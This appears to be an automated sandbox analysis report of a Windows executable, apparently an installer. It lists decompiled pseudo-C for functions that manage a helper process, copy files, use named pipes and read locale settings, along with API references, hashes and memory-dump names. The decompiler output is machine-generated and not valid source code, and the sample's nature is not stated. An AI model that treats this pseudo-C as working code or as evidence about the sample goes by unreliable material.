                                                                    • Opcode ID: de3423d4672b2301b2fae71c06c42d2de60b5f331c7d665ace9bfc361c3bdd10
                                                                    • Instruction ID: 4d26cb6eac5053f9cdac576eea358071a92945d2d4b93ba07426bed60c59251a
                                                                    • Opcode Fuzzy Hash: de3423d4672b2301b2fae71c06c42d2de60b5f331c7d665ace9bfc361c3bdd10
                                                                    • Instruction Fuzzy Hash: 9B91D5B0A042059FDB10EBA4D856FEEBBF6FB49304F514469F600A7381DA79AD81CB74
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00625D14, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00625D14(intOrPtr __eax, void* __edx) {
				long _v12;
				long _v16;
				void* __ebx;
				void* __esi;
				void* _t44;
				void* _t50;
				intOrPtr _t51;
				DWORD* _t52;

				_t19 = __eax;
				_t52 =  &_v12;
				_t44 = __edx;
				_t51 = __eax;
				if( *((char*)(__eax + 4)) == 0) {
					L11:
					return _t19;
				}
				 *((char*)(__eax + 5)) = 1;
				_v16 =  *((intOrPtr*)(__eax + 0x10));
				_v12 = 0;
				E006163B4(L"Stopping 64-bit helper process. (PID: %u)", __edx, 0,  &_v16, _t50, __eax);
				CloseHandle( *(_t51 + 0xc));
				 *(_t51 + 0xc) = 0;
				while(WaitForSingleObject( *(_t51 + 8), 0x2710) == 0x102) {
					E00616130(L"Helper isn\'t responding; killing it.", _t44, _t50, _t51);
					TerminateProcess( *(_t51 + 8), 1);
				}
				if(GetExitCodeProcess( *(_t51 + 8), _t52) == 0) {
					E00616130(L"Helper process exited, but failed to get exit code.", _t44, _t50, _t51);
				} else {
					if( *_t52 != 0) {
						_v16 =  *_t52;
						_v12 = 0;
						E006163B4(L"Helper process exited with failure code: 0x%x", _t44, 0,  &_v16, _t50, _t51);
					} else {
						E00616130(L"Helper process exited.", _t44, _t50, _t51);
					}
				}
				CloseHandle( *(_t51 + 8));
				 *(_t51 + 8) = 0;
				_t19 = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((char*)(_t51 + 4)) = 0;
				if(_t44 == 0) {
					goto L11;
				} else {
					Sleep(0xfa);
					return 0;
				}
			}











                                                                    0x00625d14
                                                                    0x00625d16
                                                                    0x00625d19
                                                                    0x00625d1b
                                                                    0x00625d21
                                                                    0x00625df3
                                                                    0x00625df3
                                                                    0x00625df3
                                                                    0x00625d27
                                                                    0x00625d2e
                                                                    0x00625d32
                                                                    0x00625d42
                                                                    0x00625d4b
                                                                    0x00625d52
                                                                    0x00625d6c
                                                                    0x00625d5c
                                                                    0x00625d67
                                                                    0x00625d67
                                                                    0x00625d8d
                                                                    0x00625dc4
                                                                    0x00625d8f
                                                                    0x00625d93
                                                                    0x00625da4
                                                                    0x00625da8
                                                                    0x00625db8
                                                                    0x00625d95
                                                                    0x00625d9a
                                                                    0x00625d9a
                                                                    0x00625d93
                                                                    0x00625dcd
                                                                    0x00625dd4
                                                                    0x00625dd7
                                                                    0x00625dd9
                                                                    0x00625ddc
                                                                    0x00625de2
                                                                    0x00000000
                                                                    0x00625de4
                                                                    0x00625de9
                                                                    0x00000000
                                                                    0x00625de9

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(?), ref: 00625D4B
                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625D67
                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625D75
                                                                    • GetExitCodeProcess.KERNEL32 ref: 00625D86
                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DCD
                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625DE9
                                                                    Strings
                                                                    • Helper process exited with failure code: 0x%x, xrefs: 00625DB3
                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 00625D3D
                                                                    • Helper process exited, but failed to get exit code., xrefs: 00625DBF
                                                                    • Helper isn't responding; killing it., xrefs: 00625D57
                                                                    • Helper process exited., xrefs: 00625D95
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                    • API String ID: 3355656108-1243109208
                                                                    • Opcode ID: c0b4aeda6ed184155dfbd483c9f69399a01c3cafee286f79e446162a0cb3cd1f
                                                                    • Instruction ID: d564c8b30f574b505304bc0216fad519ef2dd9895e072bde183416e8b9fa8f35
                                                                    • Opcode Fuzzy Hash: c0b4aeda6ed184155dfbd483c9f69399a01c3cafee286f79e446162a0cb3cd1f
                                                                    • Instruction Fuzzy Hash: 9C21AF70604F50AAD330EB78E44578BBBE69F08310F048C2DB59BC7682D734E8808B5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B740C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 145fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E006B740C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v8;
				struct HWND__* _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v28;
				struct HWND__* _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				WCHAR* _t41;
				intOrPtr _t42;
				int _t44;
				intOrPtr* _t54;
				void* _t68;
				intOrPtr _t80;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t118;

				_t118 = __fp0;
				_t106 = __esi;
				_t105 = __edi;
				_t88 = __ecx;
				_t87 = __ebx;
				_t108 = _t109;
				_t110 = _t109 + 0xffffffd4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v48 = 0;
				_v44 = 0;
				_v20 = 0;
				_v8 = 0;
				_push(_t108);
				_push(0x6b75fa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t110;
				E005C75E4( &_v20, __ebx, __ecx, __eflags);
				if(E0060D3B4(_v20, __ebx,  &_v8, __edi, __esi) == 0) {
					_push(_t108);
					_push( *[fs:eax]);
					 *[fs:eax] = _t110;
					E0060D8B0(0, _t87, _v8, __edi, __esi);
					_pop(_t104);
					_t88 = 0x6b746f;
					 *[fs:eax] = _t104;
				}
				_t41 = E0040B278(_v8);
				_t42 =  *0x6d68d0; // 0x0
				_t44 = CopyFileW(E0040B278(_t42), _t41, 0);
				_t113 = _t44;
				if(_t44 == 0) {
					_t80 =  *0x6cded8; // 0x6d5c28
					_t11 = _t80 + 0x208; // 0x0
					E006B68EC( *_t11, _t87, _t88, _t106, _t113);
				}
				SetFileAttributesW(E0040B278(_v8), 0x80);
				_v12 = E00414DA0(0, L"STATIC", 0,  *0x6d2634, 0, 0, 0, 0, 0, 0, 0);
				 *0x6d68fc = SetWindowLongW(_v12, 0xfffffffc, E006B6AB0);
				_push(_t108);
				_push(0x6b75c3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t110;
				_t54 =  *0x6cdec4; // 0x6d579c
				SetWindowPos( *( *_t54 + 0x188), 0, 0, 0, 0, 0, 0x97);
				E005C6FB0(0, _t87,  &_v44, _t105, _t106);
				_v40 = _v44;
				_v36 = 0x11;
				_v32 = _v12;
				_v28 = 0;
				E004244F8(L"/SECONDPHASE=\"%s\" /FIRSTPHASEWND=$%x ", 1,  &_v40,  &_v24);
				_push( &_v24);
				E005C6E90( &_v48, _t87, _t106, 0);
				_pop(_t68);
				E0040B470(_t68, _v48);
				_v16 = E006B6998(_v8, _t87, _v24, _t105, _t106, _t118);
				do {
				} while (E006B6A74() == 0 && MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0x4ff) == 1);
				CloseHandle(_v16);
				_pop(_t102);
				 *[fs:eax] = _t102;
				_push(E006B75CA);
				return DestroyWindow(_v12);
			}


























                                                                    0x006b740c
                                                                    0x006b740c
                                                                    0x006b740c
                                                                    0x006b740c
                                                                    0x006b740c
                                                                    0x006b740d
                                                                    0x006b740f
                                                                    0x006b7412
                                                                    0x006b7413
                                                                    0x006b7414
                                                                    0x006b7417
                                                                    0x006b741a
                                                                    0x006b741d
                                                                    0x006b7420
                                                                    0x006b7423
                                                                    0x006b7428
                                                                    0x006b7429
                                                                    0x006b742e
                                                                    0x006b7431
                                                                    0x006b7437
                                                                    0x006b7449
                                                                    0x006b744d
                                                                    0x006b7453
                                                                    0x006b7456
                                                                    0x006b7460
                                                                    0x006b7467
                                                                    0x006b7469
                                                                    0x006b746a
                                                                    0x006b746a
                                                                    0x006b747e
                                                                    0x006b7484
                                                                    0x006b748f
                                                                    0x006b7494
                                                                    0x006b7496
                                                                    0x006b7498
                                                                    0x006b749d
                                                                    0x006b74a3
                                                                    0x006b74a3
                                                                    0x006b74b6
                                                                    0x006b74e2
                                                                    0x006b74f5
                                                                    0x006b74fc
                                                                    0x006b74fd
                                                                    0x006b7502
                                                                    0x006b7505
                                                                    0x006b7517
                                                                    0x006b7525
                                                                    0x006b7533
                                                                    0x006b753b
                                                                    0x006b753e
                                                                    0x006b7545
                                                                    0x006b7548
                                                                    0x006b7559
                                                                    0x006b7561
                                                                    0x006b7565
                                                                    0x006b756d
                                                                    0x006b756e
                                                                    0x006b757e
                                                                    0x006b7581
                                                                    0x006b7586
                                                                    0x006b75a7
                                                                    0x006b75ae
                                                                    0x006b75b1
                                                                    0x006b75b4
                                                                    0x006b75c2

                                                                    APIs
                                                                      • Part of subcall function 0060D3B4: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4A1
                                                                      • Part of subcall function 0060D3B4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060D4F1), ref: 0060D4B1
                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B75FA), ref: 006B748F
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B75FA), ref: 006B74B6
                                                                    • SetWindowLongW.USER32 ref: 006B74F0
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?,00000000), ref: 006B7525
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006B7599
                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000), ref: 006B75A7
                                                                      • Part of subcall function 0060D8B0: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                                    • DestroyWindow.USER32(?,006B75CA,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B75C3,?,?,000000FC,006B6AB0,00000000,?), ref: 006B75BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                    • String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                    • API String ID: 1779715363-1630723103
                                                                    • Opcode ID: 7fedde1d07b3342257f34169e40f84480b518e12dcab26a3e4e2a454b31cf438
                                                                    • Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
                                                                    • Opcode Fuzzy Hash: 7fedde1d07b3342257f34169e40f84480b518e12dcab26a3e4e2a454b31cf438
                                                                    • Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00625FC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 55%
                                                                    			E00625FC4(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0, char _a4) {
				intOrPtr _v8;
				long _v12;
				void* _v16;
				struct _OVERLAPPED _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				long _t83;
				intOrPtr _t94;
				void* _t99;
				void* _t100;
				intOrPtr _t101;

				_t99 = _t100;
				_t101 = _t100 + 0xffffffd8;
				_v40 = 0;
				_v44 = 0;
				_v8 = __eax;
				_push(_t99);
				_push(0x626202);
				_push( *[fs:eax]);
				 *[fs:eax] = _t101;
				 *(_v8 + 0x14) =  *(_v8 + 0x14) + 1;
				 *(_v8 + 0x20) =  *(_v8 + 0x14);
				 *((intOrPtr*)(_v8 + 0x24)) = __edx;
				 *((intOrPtr*)(_v8 + 0x28)) = __ecx;
				_t83 = 0xc + __ecx;
				_push(_t99);
				_push(0x6261a7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t101;
				_v16 = CreateEventW(0, 0xffffffff, 0, 0);
				if(_v16 == 0) {
					E0060CE84(L"CreateEvent");
				}
				_push(_t99);
				_push(0x62613c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t101;
				E00407760( &_v36, 0x14);
				_v36.hEvent = _v16;
				if(TransactNamedPipe( *(_v8 + 0xc), _v8 + 0x20, _t83, _v8 + 0x4034, 0x14,  &_v12,  &_v36) != 0) {
					_pop(_t94);
					 *[fs:eax] = _t94;
					_push(E00626143);
					return CloseHandle(_v16);
				} else {
					if(GetLastError() != 0x3e5) {
						E0060CE84(L"TransactNamedPipe");
					}
					_push(_t99);
					_push(0x62610e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t101;
					if(_a4 != 0 &&  *((short*)(_v8 + 0x1a)) != 0) {
						do {
							 *((intOrPtr*)(_v8 + 0x18))();
						} while (MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0x4ff) == 1);
					}
					_pop( *[fs:0x0]);
					_push(E00626115);
					GetOverlappedResult( *(_v8 + 0xc),  &_v36,  &_v12, 0xffffffff);
					return GetLastError();
				}
			}














                                                                    0x00625fc5
                                                                    0x00625fc7
                                                                    0x00625fcf
                                                                    0x00625fd2
                                                                    0x00625fd5
                                                                    0x00625fda
                                                                    0x00625fdb
                                                                    0x00625fe0
                                                                    0x00625fe3
                                                                    0x00625fe9
                                                                    0x00625ff5
                                                                    0x00625ffb
                                                                    0x00626001
                                                                    0x00626009
                                                                    0x0062600d
                                                                    0x0062600e
                                                                    0x00626013
                                                                    0x00626016
                                                                    0x00626026
                                                                    0x0062602d
                                                                    0x00626034
                                                                    0x00626034
                                                                    0x0062603b
                                                                    0x0062603c
                                                                    0x00626041
                                                                    0x00626044
                                                                    0x00626051
                                                                    0x00626059
                                                                    0x00626085
                                                                    0x00626127
                                                                    0x0062612a
                                                                    0x0062612d
                                                                    0x0062613b
                                                                    0x0062608b
                                                                    0x00626095
                                                                    0x0062609c
                                                                    0x0062609c
                                                                    0x006260a3
                                                                    0x006260a4
                                                                    0x006260a9
                                                                    0x006260ac
                                                                    0x006260b3
                                                                    0x006260bf
                                                                    0x006260c5
                                                                    0x006260dc
                                                                    0x006260bf
                                                                    0x006260e1
                                                                    0x006260eb
                                                                    0x00626101
                                                                    0x0062610d
                                                                    0x0062610d

                                                                    APIs
                                                                    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006260D7
                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
                                                                    • GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108
                                                                      • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                    • API String ID: 2182916169-3012584893
                                                                    • Opcode ID: acb36331ee21d08b7d289947a02b8ab598f29c5b04c1412d9fc7a2506ad31a00
                                                                    • Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
                                                                    • Opcode Fuzzy Hash: acb36331ee21d08b7d289947a02b8ab598f29c5b04c1412d9fc7a2506ad31a00
                                                                    • Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0040DF90(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40e094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x6d1c14);
				if(_t28 !=  *0x6d1c2c) {
					LeaveCriticalSection(0x6d1c14);
					E0040A1C8(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x6d1c10 == 0) {
							_t18 = E0040DC78(_t28, _t28, _t44, __edi, _t44);
							L00405254();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E0040B470(_t44, E0040E0AC);
								}
								L00405254();
								E0040DC78(_t18, _t28,  &_v8, _t42, _t44);
								E0040B470(_t44, _v8);
							}
						} else {
							E0040DE74(_t28, _t44);
						}
					}
					EnterCriticalSection(0x6d1c14);
					 *0x6d1c2c = _t28;
					E0040DAF8(0x6d1c2e, E0040B278( *_t44), 0xaa);
					LeaveCriticalSection(0x6d1c14);
				} else {
					E0040B318(_t44, 0x55, 0x6d1c2e);
					LeaveCriticalSection(0x6d1c14);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040E09B);
				return E0040A1C8( &_v8);
			}









                                                                    0x0040df90
                                                                    0x0040df93
                                                                    0x0040df95
                                                                    0x0040df96
                                                                    0x0040df97
                                                                    0x0040df99
                                                                    0x0040df9d
                                                                    0x0040df9e
                                                                    0x0040dfa3
                                                                    0x0040dfa6
                                                                    0x0040dfae
                                                                    0x0040dfba
                                                                    0x0040dfe1
                                                                    0x0040dfe8
                                                                    0x0040dffa
                                                                    0x0040e003
                                                                    0x0040e014
                                                                    0x0040e019
                                                                    0x0040e021
                                                                    0x0040e026
                                                                    0x0040e02f
                                                                    0x0040e02f
                                                                    0x0040e034
                                                                    0x0040e03c
                                                                    0x0040e046
                                                                    0x0040e046
                                                                    0x0040e005
                                                                    0x0040e009
                                                                    0x0040e009
                                                                    0x0040e003
                                                                    0x0040e050
                                                                    0x0040e055
                                                                    0x0040e06f
                                                                    0x0040e079
                                                                    0x0040dfbc
                                                                    0x0040dfc8
                                                                    0x0040dfd2
                                                                    0x0040dfd2
                                                                    0x0040e080
                                                                    0x0040e083
                                                                    0x0040e086
                                                                    0x0040e093

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                                    • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                                    • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                                    • IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                                    • EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                                    • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                    • String ID: en-US,en,
                                                                    • API String ID: 975949045-3579323720
                                                                    • Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                                    • Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
                                                                    • Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                                    • Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C7FF4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E005C7FF4(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x5c80ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E00414020(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E00429D18() != 2) {
						if(E005C7A14(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E005C793C();
							RegCloseKey(_v12);
						}
					} else {
						if(E005C7A14(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E005C793C();
							RegCloseKey(_v12);
						}
					}
					E0040B4C8( &_v20, _v8, 0x5c8204);
					E00407870(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E005C80F5);
				E0040A1C8( &_v20);
				return E0040A1C8( &_v8);
			}










                                                                    0x005c7ffa
                                                                    0x005c7ffd
                                                                    0x005c8000
                                                                    0x005c8005
                                                                    0x005c8006
                                                                    0x005c800b
                                                                    0x005c800e
                                                                    0x005c8021
                                                                    0x005c8028
                                                                    0x005c803b
                                                                    0x005c8090
                                                                    0x005c809d
                                                                    0x005c80a6
                                                                    0x005c80a6
                                                                    0x005c803d
                                                                    0x005c8058
                                                                    0x005c8065
                                                                    0x005c806e
                                                                    0x005c806e
                                                                    0x005c8058
                                                                    0x005c80b6
                                                                    0x005c80c1
                                                                    0x005c80cc
                                                                    0x005c80cc
                                                                    0x005c802a
                                                                    0x005c802a
                                                                    0x005c802c
                                                                    0x005c80d2
                                                                    0x005c80d5
                                                                    0x005c80d8
                                                                    0x005c80e0
                                                                    0x005c80ed

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B
                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
